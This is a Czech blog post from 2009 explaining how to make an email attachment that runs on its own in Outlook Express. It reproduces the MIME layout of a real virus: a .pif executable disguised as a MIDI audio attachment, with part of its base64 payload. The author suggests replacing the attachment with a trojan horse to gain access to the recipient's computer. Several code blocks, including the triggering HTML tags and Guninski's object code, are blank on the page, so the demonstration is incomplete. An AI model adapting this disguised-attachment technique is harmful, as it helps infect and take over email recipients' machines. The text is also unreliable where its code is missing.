Hledání

Kategorie

Odkazy

Nástroje

Archiv

JAK VYTVOŘIT SAMOSPUSTITELNOU PŘÍLOHU K EMAILU

JAK VYTVOŘIT SAMOSPUSTITELNOU PŘÍLOHU K EMAILU

Úvod

Takže, padnul dotaz o tom, jestli se dá vytvořit samospustitelná příloha k emailu. Nutno poznamenat, že tak trochu počítám s OS Windows a prohlížečem IE. Samozřejmě, tato samospustitelná příloha nebude fungovat v “freemejl web rozhraní”, tam je to nejenom chráněné, ale některé vůbec typ těchto zpráv nepodporují.

Omezení

Původně jsem si myslel, že ti blbci v Mrkvo$ovtu něco dělají, např. bezpečnostní záplaty. Ale to jsem se hrubě mýlil. Před nějakým čáskem se po síti šířil takový červík, pokud jste v Outlook (Express) klikli jenom (!) na náhled, došlo k aktivaci viru a následné posílání viru na kontakty v Adresáři na sebe nedalo dlouho čekat. Ale když jsem updatoval svůj okenní systém na Microsoft Explorer 6.0 (-> Outlook Express 6.0) chyba pořád fungovala. Tak jsem si stáhnul nový patch pro nějakou chybu v M IE, aplikoval a co to, CHYBA STÁLE FUNGOVALA. Takže to bude asi bez omezení, pokud nepoužíváte unix.

Formátované zprávy

Formátované zprávy, kdo by je dneska neznal. V podstatě jde o to, že do standartní emailové zprávy “inteligentní” emailový klient vloží HTML tagy tak, aby to uživatel nepoznal. Pak to vypadá, jako byste mohli používat tisíce druhů písma, pozadí, hudbu a vše, co umožňuje HTML bez toho, že by to “uživatel” mohl zpozorovat. Ale samozřejmě, i tato metoda má svojí stinnou stránku. Dá se lehce zneužít k průniku na uživatelův stroj.

Příklad 1: Standartní formátovaná zpráva Outlook Express 6.0

Reply-To: "T-5 VRUGER"
From: "T-5 VRUGER"
To: "napis@zde.cz"
Subject: akce
Date: Sun, 17 Mar 2002 08:29:28 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_0035_01C1CD8D.DB714180"
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000

This is a multi-part message in MIME format.

------=_NextPart_000_0035_01C1CD8D.DB714180
Content-Type: text/plain;
charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable

Zejtra jdeme na akci Adrenalin_action

------=_NextPart_000_0035_01C1CD8D.DB714180
Content-Type: text/html;
charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable



charset=3Diso-8859-2">




Zejtra jdeme na akci=20
Adrenalin_action


------=_NextPart_000_0035_01C1CD8D.DB714180--

Všimněte si poslední části zprávy, hlavně těch HTML tagů. Název akce, Adrenalin_action tedy bude napsáno TUČNĚ ...

A jistě znáte párový tag


--I70Yg717uv5Vir40w79G14977N
Content-Type: audio/x-midi;
name=mode..pif
Content-Transfer-Encoding: base64
Content-ID:


Následuje soubor:
....
JIl//xXsRYl/i8ZdX15bwhAAVldowCSJf/8V5EWJf4t8JAxXaCsuh3=9
--I70Yg717uv5Vir40w79G14977N--

 

O co jde?
Na napis@zde.cz mi přišel virus s tímto tělem. Chybu neodstraňuje zatím žádný patch microsoftu, takže aktivaci musel zabránit můj rezidentní antivirus.

Jak to funguje?
Za aktivaci jsou podle mě zodpovědné tyto tagy:



a příloha je pojmenovaná:

Content-ID:

Takže teoreticky, stačilo by zaměnit přílohu třeba za trojského koně a získat přístup.

Také jsem našel zmínku v knize Hacking bez tajemnství:

Kód Georgi Guninského zobrazil hlášení při startu systému a po přípojení na zadanou stránku měl Georgi přístup na počítač oběti.

Kód objektu:





Tento kód by měl umožnit přístup po připojení na zadanou stránku.

Ricrdsson | 04.2.2009, 20:24 | trvalý odkaz

Komentáře:

Autor:
E-mail: WWW:
Obsah příspěvku:

[ANTISPAM] 2+2=  

Běží na blogovacím systému Xicht.cz